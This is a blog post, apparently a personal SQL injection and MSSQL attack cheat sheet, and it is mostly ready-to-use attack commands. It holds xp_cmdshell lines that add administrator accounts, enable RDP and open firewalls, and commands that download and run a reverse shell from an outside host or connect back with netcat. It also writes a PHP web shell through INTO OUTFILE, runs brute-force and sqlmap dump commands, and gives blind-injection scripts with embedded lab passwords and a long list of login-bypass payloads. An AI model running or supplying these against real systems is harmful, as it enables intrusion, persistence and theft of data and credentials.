Hello Everyone, below you can find the
cheat sheet for sql injection, its more like sql injection techniques that I frequently
use and it can give you a basic understanding of how sql injection can be performed.
THIS
IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE ONLY, AUTHOR IS
NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS
THIS
IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE ONLY, AUTHOR IS
NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS
SQLServer Abuse with nmap
#MSSQL Script Scanning using Nmap
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
#MYSQL Script Scanning using Nmap
nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.10.10.10 -p 3306
#Running ms-sql-info via NMAP
nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS
#Running ms-sql-xp-cmdshell & Executing Commands via NMAP
nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add"
nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net localgroup administrators bhanu /add" DB Ports
• MSSQL: 1433, 1434
• Oracle: 1521, 1630
• DB2: 50000, 50001
• SAP: 3200, 3300
• Postgres: 5432
• MariaDB, MySQL: 3306
• Informix: 9088, 9089
• ICS Protocols : 502 (Modbus), 20000 (DNP3), Ethemet/IP (44818)MSSQL/MYSQL DB Login Bruteforce
git clone https://github.com/m8r0wn/enumdb.git
cd enumdb
python3 setup.py install
Download Wordlist from Seclists
cat mssql-betterdefaultpasslist.txt | cut -f1 -d":" > user.txt
cat mssql-betterdefaultpasslist.txt | cut -f2 -d":" > pass.txt
#Port is optional
#-t = mysql or mssql; mssql port 1433/1434; mysql port - 3309
# -U = users.txt, -u = username; -P = passwords.txt, -p = password
enumdb -U user.txt -P pass.txt -t mssql --brute 10.10.10.10 -port 1434 -v
SQSH usage:
sqsh -S IP_Address:PORT -u username -p password
EXEC xp_cmdshell 'net users /add bhanu bhanu123'
\go
EXEC xp_cmdshell 'net localgroup administrators bhanu /add'
\goMssqlClient
Exploiting From Windows with Explanation - Nikhil Mittal
#Enumeration using Metasploit
auxiliary(admin/mssql/mssql_enum)
mssqlclient.py username@10.10.10.10
#Run arbitary commands
xp_cmdshell whoami
#View Version
SELECT @@version
#List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME();
#List Users
SELECT name FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';
#Current User
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
#list all stored proceuderes
SELECT * FROM sys.procedures
SELECT * FROM [master].INFORMATION_SCHEMA.ROUTINES WHERE ROUTINE_TYPE = 'PROCEDURE' AND LEFT(ROUTINE_NAME, 3) NOT IN ('sp_', 'xp_', 'ms_')
SELECT NAME FROM [MASTER].INFORMATION_SCHEMA.ROUTINES WHERE ROUTINE_TYPE = ''PROCEDURE''
#stored procedures and assembly modules
select * from [hostname\DB_NAME].Table_Name.sys.assembly_modules
#Enum Privs
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');
#Show Servername
select @@servername
#Show linked servers
select * from sysservers;
select name from sysservers;
#Enum Linked Remote Servers
EXECUTE ('select @@servername;') at [hostname\DB_NAME];
EXECUTE ('select suser_name();') at [hostname\DB_NAME];
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [hostname\DB_NAME];
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [hostname\DB_NAME];
#Find Stored Procedures on a linked server
EXECUTE(' SELECT * FROM [MASTER].INFORMATION_SCHEMA.ROUTINES WHERE ROUTINE_TYPE = ''PROCEDURE''') at [hostname\DB_NAME];
EXECUTE(' SELECT NAME FROM [MASTER].INFORMATION_SCHEMA.ROUTINES WHERE ROUTINE_TYPE = ''PROCEDURE''') at [hostname\DB_NAME];
#Find if CRL is enabled on the server, if the output shows CRL enabled, its explotable
select * from [hostname\DB_NAME].clients.sys.configurations where name like '%clr%enabled'
#Find the username from which we can run commands on the server
EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];
#Check sysadmin accounts on the server/DB
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];
#Check your permissions on the server
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [COMPATIBILITY\POO_CONFIG];
#Running command as a linked server using the server that we have permissions on
EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
#View the permissions you have on the linked database.
EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
#Creating a new sa user
#so that we can work easily on the DB that we have permissions on, rather than running as other user multile times
EXECUTE('EXECUTE(''CREATE LOGIN newuser WITH PASSWORD = ''''P@$$w0rd123'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''newuser'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
#Login as a new user
mssqlclient.py newuser@10.10.10.10
P@$$w0rd123
#List Databases
SELECT name FROM master..sysdatabases;
#List Objects from a selected database
to QUERY in MSSQL - [server].[db].[schema].[table]
select table_name,table_schema from DB_NAME.INFORMATION_SCHEMA.TABLES;
#Exploiting a Stored Procedure - sp_execute_external_script
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';
#Abusing Xpdirtree
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local
SQLCMD -S SERVER\Username -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P AdminEnum Linked SQL Servers #Show linked servers select * from sysservers; select name from sysservers; #Enum Linked Remote Servers EXECUTE ('select @@servername;') at [hostname\DB_NAME]; EXECUTE ('select suser_name();') at [hostname\DB_NAME]; EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [hostname\DB_NAME]; EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [hostname\DB_NAME]; #Find the username from which we can run commands on the server EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG]; when Execute doesnt work try openquery as below #List Databases in [hostname\DB_NAME] select * from openquery([hostname\DB_NAME],'select * from sys.databases')
#List Tables in clients db select * from openquery([hostname\DB_NAME],'select * from [DB_NAME].sys.tables')
#Fetch table data select * from openquery([hostname\DB_NAME],'select * from [DB_NAME].dbo.COL_NAME') #find a string in a column select * from openquery([hostname\DB_NAME],'select * from [DB_NAME].dbo.COL_NAME') where name like '%noob%'
Enum from Windows #If xp_cmdshell is disabled: Get-SQLQuery -query "EXECUTE(sp_configure 'show advanced options',1;reconfigure;)" -Verbose Get-SQLQuery -Query "EXECUTE( sp_configure 'xp_cmdshell', 1; RECONFIGURE;)" -Verbose SQLCMD -S hostname\SQLSer -Q "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;" -U Admin -P Admin #cmd Execution Get-SQLQuery -Query "EXECUTE(xp_cmdshell 'whoami')" SQLCMD -Q "EXEC xp_cmdshell 'whoami'" #Enable xp_cmdshell on a linked server and execute commands Get-SQLQuery -query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "server02.steins.local"'" Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell ''''whoami'''''') AT "server02.steins.local"' #Get Reverse Shell on a Linked Server Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell ''''dir c:\temp'''''') AT "server.steins.local"' Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell "cmd /c powershell.exe Import-Module Microsoft.PowerShell.Utility;Invoke-WebRequest http://10.10.10.10/mal.exe -OutFile c:\temp\mal.exe"'') AT "server.steins.local"' Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell "cmd /c powershell.exe Invoke-WebRequest http://10.10.10.10/mal.exe -OutFile c:\temp\mal.exe"'') AT "server.steins.local"' #mal.exe is C# reverse shell Get-SQLQuery -Query 'EXECUTE(''xp_cmdshell "cmd /c c:\temp\mal.exe"'') AT "server.steins.local"' nc -nvlp 8080
PowerUPSQL Commands #Find the SQL Instances using PowerUpSQL based on the SPN Get-SQLInstanceDomain #Get Local DB Info Get-SQLInstanceLocal #Find a machine that is acecssible Get-SQLInstanceLocal Get-SQLInstanceDomain | Get-SQLInstanceTestThreaded | Format-List #Dump all the DB Info into csv files, get the instance name from Invoke-SQLDumpInfo -Verbose -Instance "Hostname\SQLInstance" #Start SQLAudit - lists out all vulnerabilities Invoke-SQLAudit -Verbose -Instance "Hostname\SQLInstance" #Start Piv Esc on the server Invoke-SQLEscalatePriv –Verbose –Instance "Hostname\SQLInstance" #List Linked Servers Get-SQLServerLinkCrawl -Instance Hostname\SQLInstance #Scan sql servers using UDP Get-SQLInstanceScanUDP #get the list of comuter names comps = (Get-SQLInstanceDomain).Computername #Check if the current domain user has access to a database: Get-SQLInstanceDomain | GetSQLConnectionTestThreaded -Verbose #View the info the SQL Server Get-SQLInstanceDomain | Get-SQLServerInfo #get the databases and the users info Get-SQLFuzzServerLogin -Instance Sql_Serve1 –Verbose #automated DB link crawling. Get-SQLServerLinkCrawl -Instance SQL_Server1
Bruteforcing SQL Server
Invoke-BruteForce from Nishang
$comps | Invoke-BruteForce -UserList users.txt -PasswordList passwords.txt -Service SQL -Verbose
or
Invoke-BruteForce -ComputerName Sql_Server1 -UserList users.txt -PasswordList passwords.txt -Service SQL -Verbose
#bruteforcing using PowerUPSQL
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -
Username sa -Password Password -Verbose
#Login into the database as a logged in user
runas /noprofile /netonly /user:<domain\username> powershell.exe
SQL Server - Privilege Escalation
Version - SELECT @@version
Current User - SELECT SUSER_SNAME(), SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin') Current Role – SELECT user
Current database - SELECT db_name()
List all databases - SELECT name FROM master..sysdatabases
#All logins on server
SELECT * FROM sys.server_principals WHERE type_desc != 'SERVER_ROLE'
#All database users for a database
SELECT * FROM sys.database_principals WHERE type_desc != 'DATABASE_ROLE'
#List all sysadmin (More info with high priv user)
SELECT name,type_desc,is_disabled FROM
sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1
#List all database roles
use accessdb //run below query in non-default database. ex: not master datbase
SELECT DP1.name AS DatabaseRoleName, isnull (DP2.name, 'No members') AS DatabaseUserName
FROM sys.database_role_members AS DRM
RIGHT OUTER JOIN sys.database_principals AS DP1 ON DRM.role_principal_id = DP1.principal_id
LEFT OUTER JOIN sys.database_principals AS DP2
ON DRM.member_principal_id = DP2.principal_id
WHERE DP1.type = 'R'
ORDER BY DP1.name;
Effective Permissions for the server - SELECT * FROM fn_my_permissions(NULL, 'SERVER');
Effective Permissions for the database - SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
Active user token – SELECT * FROM sys.user_token
Active login token - SELECT * FROM sys.login_token
ERROR BASED SQL Injection:
============================
website.com/comment.php?id=1' /Breaks the statement
website.com/comment.php?id=738 order by 1 /Order by first column with reference to select query
website.com/comment.php?id=738 order by 7 /increase the column count, until we get an error
/This statement broke at 7, so only 6 columns
website.com/comment.php?id=738 union select 1,2,3,4,5,6
/union all is used to combine 2 or more select statements
/Where ever output is displayed - it is suitable to enumerate, here 5
website.com/comment.php?id=738 union select 1,2,3,4,@@version,6 /mysql version command
website.com/comment.php?id=738 union select 1,2,3,4,user(),6 /Current user
website.com/comment.php?id=738 union select 1,2,3,4,table_name,6 FROM information_schema.tables
/Prints all of the table names in the database
website.com/comment.php?id=738 union select 1,2,3,4,column_name,6 FROM information_schema where table_name='users'
/Extract column names from Table - Ue
website.com/comment.php?id=738 union select 1,2,name,4,password,6 FROM users
ERROR BASED SQL Injection: SQLLITE
==================================
http://localhost:3000/rest/products/search?q=')) union select 1,sqlite_version(),3,4,5,6,7,8,9--;
http://localhost:3000/rest/products/search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,9 FROM sqlite_master--;
search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,tbl_name FROM sqlite_master--; # Get all table names in sqlite_master db
search?q=sadsa')) union select 1,sqlite_version(),3,4,5,6,7,email,password FROM Users--; #Get usernames and passwords
Error Based SQL Injection using SQLMAP
sqlmap -u "http://website.com/index.php?debug" --string="This user exists" --auth-type=Basic --auth-cred=username:password --data "username=user2" --level=5 --risk=3Automating Blind SQL Injection Example: import requests from requests.auth import HTTPBasicAuth chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' filtered = '' passwd = '' for char in chars: Data = {'username' : 'natas16" and password LIKE BINARY "%' + char + '%" #'} r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data) if 'exists' in r.text : filtered = filtered + char for i in range(0,32): for char in filtered: Data = {'username' : 'natas16" and password LIKE BINARY "' + passwd + char + '%" #'} r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data) if 'exists' in r.text : passwd = passwd + char print(passwd) break
Code by Abatchy's blog SQL Injection sample code import requests url='http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/index.php' passchar='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXVZ1234567890' bstr='This user exist'.encode('utf-8') password='' for i in range(32): for j in passchar: req = requests.get(url+'?username=natas16" AND password LIKE BINARY "' + password + j + '%" "') if req.content.find(bstr) != -1: password += j print('Password: ' + password) break Code by AnonHack.in
TIME BASED SQL INJECTION:
--------------------------
In Time Based SQL injection - if the query is true - it will wait for the sleep time or else
executed immediately.
website.com/comment.php?id=738-sleep(5) /5 Seconds to load
website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0)
/Executes after 5 seconds -Because the statement is true
website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0)
/Executes Immediately - Statement is false
website.com/comment.php?id=738 union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
/Loading a file from the server
website.com/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec(#_GET['cmd']);?>",6 into OUTFILE 'C:/xampp/htdocs/backdoor.php'
website.com/backdoor.php/cmd?ipconfig
Automating Time-Based SQL Injection Example:
import requests
from requests.auth import HTTPBasicAuth
Auth=HTTPBasicAuth('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
headers = {'content-type': 'application/x-www-form-urlencoded'}
filteredchars = ''
passwd = ''
allchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
# SELECT * from users where username="_natas18" and password like binary '%a%' and sleep(5) #
#password for natas18 does contain the letter ‘a’ and sleep(5) was executed. if the pass has letter 'a' it takes 5 secs to load
for char in allchars:
payload = 'username=natas18%22+and+password+like+binary+%27%25{0}%25%27+and+sleep%281%29+%23'.format(char)
r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers)
if(r.elapsed.seconds >= 1):
filteredchars = filteredchars + char
print(filteredchars)
print(filteredchars)
for i in range(0,32):
for char in filteredchars:
payload = 'username=natas18%22%20and%20password%20like%20binary%20\'{0}%25\'%20and%20sleep(1)%23'.format(passwd + char)
r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers)
if(r.elapsed.seconds >= 1):
passwd = passwd + char
print(passwd)
break
Code written by Abatchy's blog
SQL Command Injection: MSSQL
bhanu';EXEC Master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\omg.txt';--
admin';EXEC xp_cmdshell 'certutil -urlcache -f http://IP_Address/shell.asp';--
admin';EXEC Master.dbo.xp_cmdshell 'c:\share\nc.exe KALI_IP 9002 -e cmd.exe
sqsh -S IP_ADDRESS:27900 -U sa -L user=sa -L password=password
If xp_cmdshell is disabled:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Creating an Admin Account with RDP Access:
aaa';EXEC Master.dbo.xp_cmdshell 'net user /add bhanu bhanu123';--
aaa';EXEC Master.dbo.xp_cmdshell 'net localgroup administrators bhanu /add';--
aaa';EXEC Master.dbo.xp_cmdshell 'reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0';--
aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remoteadmin enable';--
aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remotedesktop enable';--
aaa';EXEC Master.dbo.xp_cmdshell 'mstsc /console /v:IP_Address';---
NSE Script for XP_CMDSHELL
Bypassing Restriction Interfaces:
----------------------------------
Use Tamper Data Firefox plugin. /Intercetps Posts requests
start tampter data --> input something inoto input field. or change the items in
drop down.
SQLMAP:
---------
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --dump --threads=5
/Dump All DB data
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --os-shell
sqlmap --help
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
List all the databases:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--dbs
Current User:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--current-user
Current DB:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--current-db
Tables:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--tables -D owasp10
Columns:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--columns -T accounts -D owasp10
Dump:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
-T accounts -D owasp10 --dump
OS Shell:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--os-shell
SQL Shell:
sqlmap -u
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
--sql-shell
current_user()
user()
database()
select tablename from information_schema.table where table_schema = 'owasp10'
Methodology
1) Check for login pages - try all special characters
2) f12 --> run the page; check for any search functionality like search?q= or id=1?; something like that
Cheatsheet
admin' or 1=1; --
admin' OR 1=1 -- -
search?q='))--;
' or '1'='1
' or 1=1;--
' or 1=1;#
') or ('x'='x
' or like '%';--
' or 1=1 LIMIT 1;--
USERNAME: ' or 1/*
PASSWORD: */ =1 --
USERNAME: admin' or 'a'='a
PASSWORD '#
If the database is mysql, try to dump all login info to files?
Mysql '*'
'&'
'^'
'-'
' or true;--
' or 1;--
union all select "",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
No comments:
Post a Comment